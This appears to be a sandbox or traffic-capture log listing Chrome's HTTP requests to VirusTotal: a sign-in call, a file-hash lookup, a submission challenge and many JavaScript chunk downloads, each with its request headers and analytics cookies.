                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      POST /ui/signin HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      content-length: 4
                                                                                                                                                                      x-tool: vt-ui-main
                                                                                                                                                                      accept: application/json
                                                                                                                                                                      x-app-version: v1x143x1
                                                                                                                                                                      x-vt-anti-abuse-header: MTQzNTczMzA2MjEtWkc5dWRDQmlaU0JsZG1scy0xNjczMjcyMjE0LjkxOQ==
                                                                                                                                                                      accept-ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      origin: https://www.virustotal.com
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/stackdriver-errors.239a9bb4d545f6f3f8ee.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/stackdriver-errors.239a9bb4d545f6f3f8ee.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/3789.1cda18a27da511a6130f.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/3789.1cda18a27da511a6130f.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      x-tool: vt-ui-main
                                                                                                                                                                      accept: application/json
                                                                                                                                                                      x-app-version: v1x143x1
                                                                                                                                                                      x-vt-anti-abuse-header: MTk4MjY5NTYxODgtWkc5dWRDQmlaU0JsZG1scy0xNjczMjcyMjI1LjEyNA==
                                                                                                                                                                      accept-ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/ui/files/submission/challenge
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /ui/files/submission/challenge HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      x-tool: vt-ui-main
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      x-app-version: v1x143x1
                                                                                                                                                                      accept: application/json
                                                                                                                                                                      cache-control: no-cache
                                                                                                                                                                      accept-ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                      x-vt-anti-abuse-header: MTQyMDU5NTE3NDMtWkc5dWRDQmlaU0JsZG1scy0xNjczMjcyMjI1LjQzMQ==
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/4503.2b0c4f32872d924210c7.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/4503.2b0c4f32872d924210c7.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/5005.fc3caf94a0684737c1fd.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/5005.fc3caf94a0684737c1fd.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/9074.7e2a5bbdfe0196aa5d0a.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/9074.7e2a5bbdfe0196aa5d0a.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/9965.2fd257c2ca1b9b66cc0d.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/9965.2fd257c2ca1b9b66cc0d.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/4311.914d50b4d95aacf7225b.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/4311.914d50b4d95aacf7225b.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/7953.9a6e2044f0e511868a41.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/7953.9a6e2044f0e511868a41.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/6885.e13d423275cffe8e0382.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/6885.e13d423275cffe8e0382.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/2592.8400c60cdfd274a4145e.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/2592.8400c60cdfd274a4145e.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/5701.707b0c8562c1cae0df7d.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/5701.707b0c8562c1cae0df7d.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/3334.065f1a91b60b07b0c5dc.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/3334.065f1a91b60b07b0c5dc.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/7922.24578c1a71b32f0e51d1.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/7922.24578c1a71b32f0e51d1.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/3586.e264ac9d790c1a369398.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/3586.e264ac9d790c1a369398.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/4985.08366cc6bafa91f6babf.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/4985.08366cc6bafa91f6babf.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/3175.4f88c9f0852ec3c0344c.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/3175.4f88c9f0852ec3c0344c.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/3659.7349226393281cbfc478.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/3659.7349226393281cbfc478.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/2366.1a85616a4e6e926a9fc7.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/2366.1a85616a4e6e926a9fc7.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/4940.790d8b5b48ed146de206.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/4940.790d8b5b48ed146de206.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/3449.89868b14145e1d880721.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/3449.89868b14145e1d880721.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/672.535889cc9667fec91198.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/672.535889cc9667fec91198.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/3855.9955e2e9c1622f3aa1de.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/3855.9955e2e9c1622f3aa1de.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/6842.d82ffeefb51cc24f374f.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/6842.d82ffeefb51cc24f374f.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
